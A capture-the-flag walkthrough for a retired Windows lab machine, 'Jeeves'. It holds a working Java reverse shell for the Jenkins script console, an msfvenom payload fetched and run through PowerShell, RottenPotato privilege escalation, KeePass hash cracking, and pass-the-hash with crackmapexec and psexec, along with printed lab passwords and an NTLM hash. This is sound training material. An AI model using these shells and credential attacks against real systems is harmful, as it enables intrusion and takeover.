Today, we’re going to solve another CTF machine “Jeeves”. It is now retired box and can be accessible to VIP member.
Specifications
- Target OS: Windows
- IP Address: 10.10.10.63
- Difficulty: Medium
Contents
- Getting user
- Getting root
Enumeration
As always, the first step consists of reconnaissance phase as port scanning.
Ports Scanning
During this step we’re gonna identify the target to see what we have behind the IP Address.
nmap -p 1-65535 -T4 -A -v 10.10.10.63
Enumerating Port 80
Nmap reveals IIS httpd 10.0 running on port 80 with a search page showing ask jeeves.
If you check page source there’s an error.html page which just has jeeves.PNG image.
This image reveals some of the information which might help us in exploiting or doing priv esc on the box.
Enumerating Port 50000
Nmap reveals Jetty service running on port 50000 and if we browse the page 10.10.10.63:50000
Let’s run the dirbuster to see if there’s anything hidden.
We found /askjeeves and let’s take a look at it.
Exploitation
If we google about Jenkins exploits we found we can use the Jenkins-CI Groovy script console to execute OS commands using Java.
Reverse Shell: https://alionder.net/jenkins-script-console-code-exec-reverse-shell-java-deserialization
Manage Jenkins > Script Console
Reverse Shell
String host="10.10.14.27";
int port=1337;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Click Run and Start the listener.
Since, we got the low privilege shell let’s try upgrading it through meterpreter.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=1338 -f exe > shell.exe
Using Powershell to transfer our generated shell.exe file targeted machine.
powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.27:8000/shell.exe', 'shell.exe')"
After running the powershell and executing shell.exe we got meterpreter session.
We can find user.txt under C:\Users\kohsuke\Desktop
Privilege Escalation
Method 1
We start by gathering basic information about our targeted system so let’s check systeminfo first.
Copy all this information into local file named systeminfo.txt. Now we’re gonna run windows exploit suggester.
python windows-exploit-suggester.py --update python windows-exploit-suggester.py --database 2019-08-01-mssb.xls --systeminfo systeminfo.txt
The machine is vulnerable with MS16-075 (RottenPotato)
• https://github.com/foxglovesec/RottenPotato
Abusing Token Privileges For Windows Local Privilege Escalation
• https://github.com/foxglovesec/RottenPotato
• https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation
Currently there’s no Impersonation Tokens available let’s run the RottenPotato.exe again.
There you go!
impersonate_token "NT AUTHORITY\\SYSTEM"
And we’re NT AUTHORITY\SYSTEM.
Method 2
There’s a file CEH.kdbx under C:\Users\kohsuke\Documents.
After downloading a file we had to make sure of the file type.
This reveals Keepass password database file type.
Open KeePass file.
keepassx CEH.kdbx
This file is protected with a password but we know how to get it 🙂
There’s a pre-installed program in Kali named keepass2john.
keepass2john CEH.kdbx > key CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282 f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
Let’s crack the hash key.
Cracking Has Using John
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt key
Password: moonshine1
Let’s open our keepass file.
There’s bunch of data to be noted upon checking each of them we found backup stuff revealing critical information.
NTLM Hash: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 The SMB service is running on the targeted machine we can attempt to authenticate to the system using password spray attack or pass-the-hash attack.
Here’s the remaining content of keepass file.
Password 12345 F7WhTrSFDKB6sxHU1cUn pwndyouall! lCEUnYPjNfIuPZSzOySA S1TjAtJHKsugh9oC4VZl aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
But we found something interesting inside Backup Stuff.
NTLM Hash: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
The SMB service is running on the targeted machine we can attempt to authenticate to the system using password spray attack or pass-the-hash attack.
crackmapexec smb 10.10.10.63 -u Administrator -p passwords.txt --lusers crackmapexec smb 10.10.10.63 -u Administrator -H hash.txt --lusers
Metasploit PSEXEC Module
Module: exploit/windows/smb/psexec
Now let’s run it!
And we’re NT Authority.
Now let’s look for the flag.
dir /a will show all the hidden files on the system and dir /R will show the alternative data stream.
The hm.txt:root.txt:$DATA means that root.txt is inside the alternative data stream of hm.txt
To read the root.txt more < hm.txt:root.txt:$DATA
